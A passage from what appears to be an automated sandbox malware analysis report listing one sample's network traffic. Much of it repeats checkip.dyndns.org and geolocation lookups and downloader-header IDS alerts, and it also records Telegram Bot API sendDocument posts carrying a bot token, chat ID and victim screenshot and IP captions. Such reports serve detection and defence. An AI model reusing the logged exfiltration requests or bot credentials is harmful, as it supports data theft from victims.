20%5C___%7C%5C___%7C___%7C_%7C_%5C%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A***********************************************************%20%0D%0A%0D%0A%0D%0A==========PC%20INFO==========%0D%0AClient%20Name:849224%0D%0AFullDate:%2012/12/2024%20-%2015:38:35%0D%0AIP:%208.46.123.189%0D%0ACountry:%20United%20States%0D%0A==========PC%20INFO========== HTTP/1.1Content-Type: multipart/form-data; boundary================8dd20fa5dde6e74Host: api.telegram.orgContent-Length: 675718Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: POST /bot7553624894:AAGTJv4BkRj8lx4-LF3RVSC0dG1iGleV1FU/sendDocument?chat_id=8064644982&caption=user%20/%20SCREENSHOT%20/%208.46.123.189%0D%0A%0D%0A***********************************************************%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20_%20%20%20%20___%20%20%20___%20%20___%20___%20___%20%20%20%20*%0D%0A*%20%20%20%20%20%20Best%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7C%20%7C%20%20/%20_%20%5C%20/%20__%7C/%20__%7C%20__%7C%20_%20%5C%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7C%20%7C_%7C%20(_)%20%7C%20(_%20%7C%20(_%20%7C%20_%7C%7C%20%20%20/%20%20%20*%0D%0A*%20%20%20%20%20%20Private%20%20-%20-%20-%20-%3E%20%20%7C____%5C___/%20%5C___%7C%5C___%7C___%7C_%7C_%5C%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A***********************************************************%20%0D%0A%0D%0A%0D%0A==========PC%20INFO==========%0D%0AClient%20Name:849224%0D%0AFullDate:%2012/12/2024%20-%2015:38:35%0D%0AIP:%208.46.123.189%0D%0ACountry:%20United%20States%0D%0A==========PC%20INFO========== HTTP/1.1Content-Type: multipart/form-data; boundary================8dd23ea346a9abbHost: api.telegram.orgContent-Length: 675718Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: POST /bot7553624894:AAGTJv4BkRj8lx4-LF3RVSC0dG1iGleV1FU/sendDocument?chat_id=8064644982&caption=user%20/%20SCREENSHOT%20/%208.46.123.189%0D%0A%0D%0A***********************************************************%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20_%20%20%20%20___%20%20%20___%20%20___%20___%20___%20%20%20%20*%0D%0A*%20%20%20%20%20%20Best%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7C%20%7C%20%20/%20_%20%5C%20/%20__%7C/%20__%7C%20__%7C%20_%20%5C%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7C%20%7C_%7C%20(_)%20%7C%20(_%20%7C%20(_%20%7C%20_%7C%7C%20%20%20/%20%20%20*%0D%0A*%20%20%20%20%20%20Private%20%20-%20-%20-%20-%3E%20%20%7C____%5C___/%20%5C___%7C%5C___%7C___%7C_%7C_%5C%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A***********************************************************%20%0D%0A%0D%0A%0D%0A==========PC%20INFO==========%0D%0AClient%20Name:849224%0D%0AFullDate:%2012/12/2024%20-%2015:38:35%0D%0AIP:%208.46.123.189%0D%0ACountry:%20United%20States%0D%0A==========PC%20INFO========== HTTP/1.1Content-Type: multipart/form-data; boundary================8dd86d580dca017Host: api.telegram.orgContent-Length: 675720Connection: Keep-Alive
                Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                Source: Joe Sandbox ViewIP Address: 193.122.6.168 193.122.6.168
                Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
                Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                Source: unknownDNS query: name: checkip.dyndns.org
                Source: unknownDNS query: name: reallyfreegeoip.org
                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49712 -> 193.122.6.168:80
                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49707 -> 193.122.6.168:80
                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:50004 -> 193.122.6.168:80
                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:50061 -> 193.122.6.168:80
                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:50051 -> 193.122.6.168:80
                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:50098 -> 193.122.6.168:80
                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:50069 -> 193.122.6.168:80
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: unknownHTTPS traffic detected: 172.67.177.134:443 -> 192.168.2.5:49709 version: TLS 1.0
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
